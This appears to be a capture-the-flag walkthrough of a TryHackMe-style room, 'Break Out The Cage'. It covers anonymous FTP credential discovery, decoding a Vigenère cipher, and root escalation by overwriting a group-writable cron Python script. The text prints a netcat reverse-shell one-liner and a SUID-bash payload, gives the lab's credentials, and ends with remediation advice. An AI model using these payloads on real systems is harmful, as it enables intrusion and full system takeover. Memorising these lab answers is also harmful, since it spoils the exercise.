Target IP: cage.thm (Requires /etc/hosts entry)
Difficulty: Easy/Medium
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
“Break Out The Cage” requires identifying credentials hidden in plain sight via Anonymous FTP to gain initial access. Lateral movement to the user cage is achieved by analyzing internal emails and decoding a Vigenère Cipher using a context-clue key (“FACE”). Privilege escalation to root exploits a Python script running as a cron job that is writable by the cage user, allowing for code injection.
Key TTPs (MITRE ATT&CK):
- T1078 (Valid Accounts): Anonymous FTP to retrieve credentials.
- T1027 (Obfuscated Files or Information): Decoding Vigenère ciphers.
- T1053 (Scheduled Task/Job): Exploiting a writable Cron script.
- T1574 (Hijack Execution Flow): Modifying a script executed by Root.
2. Operational Setup
Host Configuration
echo "10.10.x.x cage.thm" | sudo tee -a /etc/hostsWorkspace (Tmux)
- Pane 1 (Recon):
nmap,ftp. - Pane 2 (Shell): SSH connections.
- Pane 3 (Tools):
CyberChef(in browser) or python for decoding.
3. Enumeration: “The Legend”
A. Network Scanning
nmap -sC -sV -oA nmap/cage cage.thmResults:
- 21/tcp (FTP):
vsftpd 3.0.3-> Anonymous Allowed. - 22/tcp (SSH): OpenSSH 7.6p1.
- 80/tcp (HTTP): Apache. Website dedicated to Nicolas Cage.
B. FTP Enumeration (Initial Access)
Anonymous FTP is the obvious entry point.
ftp cage.thm
# User: anonymous, Pass: anonymous
ls -la
get dad_tasksAnalyzing dad_tasks:
The file contains a to-do list and a very long string at the bottom:
In case I forget… Mydadisghostrideraintthatcoolnocausehesonfirejokes
This looks like a passphrase. The username associated with the file owner (from ls -la) or context from the website is likely weston (Nicolas Cage’s son).
Credentials Found:
- User:
weston - Password:
Mydadisghostrideraintthatcoolnocausehesonfirejokes
4. Lateral Movement: The Cipher
A. SSH Access
We log in as Weston.
ssh weston@cage.thmNote: The terminal immediately starts getting spammed with Broadcast messages (Wall).
“AHHHHHHH THEEEEE BEEEEESSSS!!!!!!!!”
This noise confirms a script is running periodically in the background.
B. Enumerating Emails
We find a directory email_backup in Cage’s home folder (or readable by Weston).
cat email_1, email_2, email_3.
Email 3 Analysis:
…Sean left a note on his desk… *The note said:
haiinspsyanileph*The guy also seems obsessed with my face lately. He came him wearing a mask of my face…
This is a classic setup for a Vigenère Cipher.
- Ciphertext:
haiinspsyanileph - Key:
FACE(Derived from the emphasis on “face” and the movie Face/Off mentioned in Email 1).
Decryption: You can use CyberChef or a simple tool.
haiinspsyanileph+ KeyFACE=cageisnotalegend
C. Switching User
su cage
# Password: cageisnotalegendStatus: We are now user cage.
5. Privilege Escalation: The Script
A. Identifying the Noise
The broadcast messages are coming from somewhere. We check running processes or search for scripts.
ps aux | grep python
# or
ls -la /optWe find a hidden directory: /opt/.dads_scripts.
Inside is a python script: spread_the_quotes.py.
B. Analyzing Permissions
ls -l /opt/.dads_scripts/spread_the_quotes.py
# -rwxrwxr-x 1 root cage 234 ... spread_the_quotes.pyCritical Misconfiguration:
- Owner:
root(It runs as root, hence the broadcast messages). - Group:
cage. - Permissions:
rwxfor Group.
The user cage can write to this file. Since root executes it periodically (Cron), any code we put in there will run as root.
C. The Exploit
We replace the script with a reverse shell or a permission change.
Option 1: Reverse Shell
echo "import os; os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.x.x 4444 >/tmp/f')" > /opt/.dads_scripts/spread_the_quotes.pyOption 2: SUID Bash (Easier/More Stable)
echo "import os; os.system('chmod u+s /bin/bash')" > /opt/.dads_scripts/spread_the_quotes.pyD. Execution
Wait 1-2 minutes for the cron job to trigger. If you used Option 2:
ls -la /bin/bash
# -rwsr-xr-x 1 root root ... /bin/bash <-- SUID bit set!
/bin/bash -pResult:
# whoami
rootRoot Flag: /root/email_backup/email_master (contains the flag THM{...}).
6. Remediation (Blue Team)
- File Permissions:
- Scripts executed by Root (via Cron or Systemd) must never be writable by standard users.
- Fix:
chown root:root spread_the_quotes.pyandchmod 700 spread_the_quotes.py.
- Sensitive Data Storage:
- Passwords and keys should not be stored in plaintext files (
dad_tasks) accessible via Anonymous FTP.
- Disable Anonymous FTP:
- Set
anonymous_enable=NOinvsftpd.conf.